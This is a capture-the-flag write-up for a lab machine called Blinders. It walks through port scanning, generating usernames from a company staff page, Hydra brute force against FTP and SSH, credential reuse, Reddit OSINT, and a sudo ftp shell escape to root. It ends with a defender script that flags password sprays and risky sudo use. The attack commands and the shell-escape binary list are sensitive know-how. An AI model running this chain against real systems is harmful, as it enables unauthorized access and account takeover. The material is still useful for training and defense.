CTF WRITEUP CUSTOM MACHINE BLACK BOX

Blinders — Black Box Pentest Writeup

Written By: Thomas_Shelby

Difficulty: Medium

Target IP: 192.168.1.9

Blinders is a Medium-difficulty black-box CTF machine. Starting with zero prior knowledge of the target, the attack chain involves OSINT-based username enumeration against a company website, FTP credential brute force, password reuse across SSH, social media OSINT via Reddit, and a MySQL credential chain leading to a sudo GTFObins FTP escape for root.

01_Reconnaissance

Initial port scan reveals three key services: FTP (21), an HTTP server on a non-standard port (445), and a custom SSH port (2123).

terminal / nmap
$ sudo nmap -p21,445,2123 192.168.1.9 -sV

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp
445/tcp  open  http     (Company website)
2123/tcp open  ssh      OpenSSH

Navigating to the website on port 445 reveals the Blinders PVT LTD company site. The Follow Us section contains a GitHub link. Right-clicking → Open Link in New Tab takes us to the company GitHub.

Figure 1.0 — Blinders PVT LTD company website

The GitHub page leads to the company site at blinders-pvt-ltd.github.io. Navigating to the Our Team section reveals all employee full names — critical intelligence for username generation.

terminal / username-anarchy
# Clone username generation tool
$ git clone https://github.com/urbanadventurer/username-anarchy
$ cd username-anarchy

# Generate usernames from team names collected from the website
$ ./username-anarchy --input-file blinder.txt > blinderusername.txt

02_FTP_Brute_Force

Using the generated username wordlist against the FTP service with Hydra and a common password list yields valid credentials.

terminal / hydra FTP
$ hydra -L blinderusername.txt -P /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ftp://192.168.1.9

[21][ftp] host: 192.168.1.9   login: scottg   password: [REDACTED]

Logging in as scottg and downloading Welcome.pdf reveals a second password embedded in the document.

terminal / FTP session
$ ftp 192.168.1.9
Name: scottg
Password: [REDACTED]

ftp> ls
ftp> get Welcome.pdf

# Welcome.pdf contains a new password credential

03_SSH_Initial_Access

The password found in the PDF is tested against the custom SSH port (2123) with the same username wordlist via Hydra. It turns out to be reused by another employee.

terminal / hydra SSH
$ hydra -L blinderusername.txt -p '[REDACTED]' ssh://192.168.1.9 -s 2123

[2123][ssh] host: 192.168.1.9   login: sophiale   password: [REDACTED]

$ ssh sophiale@192.168.1.9 -p 2123

sophiale@blinders:~$ cat Teammate.txt
Aiden Hall: aidenhall1987

04_OSINT_Reddit_Enumeration

The Teammate.txt file maps Aiden Hall to the handle aidenhall1987. Running Sherlock on this username reveals an active Reddit account whose bio mentions work at Blinders PVT LTD; the same Reddit profile is also linked from the company website.

OSINT Finding

The company website contained a Reddit link for the employee. Sherlock confirmed the username, and the Reddit bio disclosed employer affiliation — a common OSINT vector in real engagements where employees over-share on social media.

terminal / sherlock + ssh
# Username OSINT
$ sherlock aidenhall1987
[+] Reddit: Found username — bio mentions Blinders PVT LTD

# SSH login as aidenhall1987
$ ssh aidenhall1987@192.168.1.9 -p 2123
Password: [REDACTED]

aidenhall1987@blinders:~$ cat .bash_history
mysql -u lwhite -p[REDACTED]

05_PrivEsc_via_Sudo_FTP

The bash history reveals MySQL credentials for user lwhite. The same password is reused for the lwhite system account, and sudo -l shows lwhite can run ftp as root, a classic GTFObins escalation.

terminal / privesc
# Switch to lwhite using credential from bash history
$ su lwhite
Password: [REDACTED]

lwhite@blinders:~$ sudo -l
(ALL) /usr/bin/ftp

# GTFObins FTP shell escape
lwhite@blinders:~$ sudo ftp
ftp> !/bin/sh

# whoami → root

# cat /root/flag.txt

Technique Note — GTFObins

When sudo ftp is permitted, the ! command inside the FTP client spawns a shell with the privileges ftp itself is running under; because ftp was started via sudo, that shell is root. This is documented on GTFObins/ftp. Always check sudo permissions after gaining any new user context.
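As an added defender-side example (not part of the writeup), the script below triages constructed auth.log lines for the two loudest steps in this chain: the Hydra spray against SSH, which shows up as one source failing against many distinct usernames, and a sudo-to-root run of a binary with a documented shell escape. The log lines, the attacker source 192.168.1.50 and the escape list are constructed assumptions.

```python
"""Triage constructed auth.log lines for the SSH password spray and the
sudo-to-ftp step of this chain.  Example code, not from the writeup;
every log line and the source IP below are constructed."""
import re

# Constructed sample: a Hydra spray from 192.168.1.50, then the privesc step.
AUTH_LOG = """\
Mar 10 11:58:01 blinders sshd[1201]: Failed password for invalid user thomas.shelby from 192.168.1.50 port 51201 ssh2
Mar 10 11:58:01 blinders sshd[1202]: Failed password for invalid user tshelby from 192.168.1.50 port 51202 ssh2
Mar 10 11:58:02 blinders sshd[1203]: Failed password for scottg from 192.168.1.50 port 51203 ssh2
Mar 10 11:58:02 blinders sshd[1204]: Failed password for invalid user arthurs from 192.168.1.50 port 51204 ssh2
Mar 10 11:58:03 blinders sshd[1205]: Accepted password for sophiale from 192.168.1.50 port 51205 ssh2
Mar 10 12:10:44 blinders sudo:   lwhite : TTY=pts/0 ; PWD=/home/lwhite ; USER=root ; COMMAND=/usr/bin/ftp
Mar 10 12:30:00 blinders sudo:   admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt update
"""

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted password for (\S+) from (\S+)")
SUDO = re.compile(r"sudo:\s+(\S+) : .*USER=(\S+) ; COMMAND=(\S+)")

# Assumed list of binaries with a documented GTFOBins shell escape; ftp is the one this box used.
SHELL_ESCAPES = {"/usr/bin/ftp", "/usr/bin/vim", "/usr/bin/less", "/usr/bin/man", "/usr/bin/find"}


def spray_sources(log, threshold=3):
    """Map src_ip -> (distinct usernames failed, whether a login was later accepted)
    for sources failing against `threshold` or more different users: one password
    tried against many accounts is the signature of the Hydra -L run above."""
    users = {}
    for m in FAILED.finditer(log):
        users.setdefault(m.group(2), set()).add(m.group(1))
    accepted = {m.group(2) for m in ACCEPTED.finditer(log)}
    return {ip: (len(u), ip in accepted) for ip, u in users.items() if len(u) >= threshold}


def risky_sudo(log):
    """Return (user, command) for every sudo-to-root run of a shell-escape binary."""
    hits = []
    for m in SUDO.finditer(log):
        user, target, cmd = m.groups()
        if target == "root" and cmd in SHELL_ESCAPES:
            hits.append((user, cmd))
    return hits


if __name__ == "__main__":
    print(spray_sources(AUTH_LOG))  # {'192.168.1.50': (4, True)}
    print(risky_sudo(AUTH_LOG))     # [('lwhite', '/usr/bin/ftp')]
```

A spray source that is later accepted, as here, is the case worth paging on: the password reuse that let the chain continue.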

06_Attack_Chain_Summary

  1. Nmap scan → ports 21 (FTP), 445 (HTTP), 2123 (SSH)
  2. Website OSINT → GitHub → Team page → employee full names
  3. Username-anarchy → username wordlist generation
  4. Hydra FTP brute force → scottg:[REDACTED]
  5. FTP → Welcome.pdf → new credential found
  6. Hydra SSH (port 2123) → sophiale with PDF password (credential reuse)
  7. Teammate.txt → aidenhall1987 → Sherlock → Reddit OSINT
  8. SSH as aidenhall1987 → .bash_history → MySQL credentials for lwhite
  9. su lwhite → sudo -l → sudo ftp → !/bin/sh → ROOT